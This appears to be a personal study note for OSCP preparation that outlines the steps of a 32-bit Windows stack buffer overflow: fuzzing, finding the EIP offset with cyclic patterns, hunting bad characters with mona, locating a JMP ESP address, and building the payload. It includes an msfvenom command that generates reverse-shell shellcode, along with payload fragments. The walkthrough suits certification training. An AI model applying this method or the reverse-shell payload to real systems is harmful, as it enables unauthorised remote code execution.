Binary Exploitation (a *very* brief overview)
Binary Exploitation⚑
During my studies to become OSCP certified I studied quite a bit but never delved too far into binary exploitation. Here are a few takeaways and things that I occasionally look back at. Mostly here's the high-level operational view. Mind you, this is for a 32bit windows app lol
1. Start Immunity/app as administrator
2. Confirm connectivity from kali⚑
nc port
3. Fuzz for crash (Template - Fuzzer )⚑
4. Generate cyclic pattern to find exact crash⚑
[root@kali:/root]# cyclic 300
5. Add pattern to "overflow" in and repro crash⚑
6. Get offset from address in EIP and set "offset"⚑
Get address in EIP and find number of bytes to EIP:
[root@kali:/r/c/CMBOF]# cyclic -l 0x61616275
7. Remove cyclic pattern from "overflow" and replace with "A" * offset⚑
offset = 634 # EIP @ 0x616A6761
overflow = b"A" * offset
eip = b"BBBB" #
8. Replicate crash and confirm "B" in EIP⚑
9. Find Bad Characters with mona⚑
- Set working dir:
!mona config -set workingfolder C:\Windows\Temp
- Create bytearray (without bad chars we know about)
!mona bytearray --cpb "\x00"
- Include list chars in payload (without \x00)
badchars = [0x00] # start with null
- Repro crash with charpayload
- After the crash use mona to find the next bad char:
!mona compare -f C:\Windows\Temp\bytearray.bin -a esp
- Note new bad char, add it to "badchars"
- Repeat steps until no new bad chars are reported
10. Find Jump Point using bad chars (running or crashed) - will be in "Log Data" window⚑
!mona jmp -r esp -cpb "\x00\x23\x3c\x83\xba"
11. Put jmp address in "eip" var backwards (little endian)⚑
eip = b"\xfa\x11\x50\x62" # 625011AF
12. Generate shellcode without bad chars and add as "sc" var⚑
[root@kali:/r/c/t/O/OVERFLOW2]# msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=6666 EXITFUNC=thread -b "\x00\x23\x3c\x83\xba" -f python -v sc
13. Add shellcode⚑
14. Add NOPs and comment out "charpayload"⚑
padding = b"\x90" * 16
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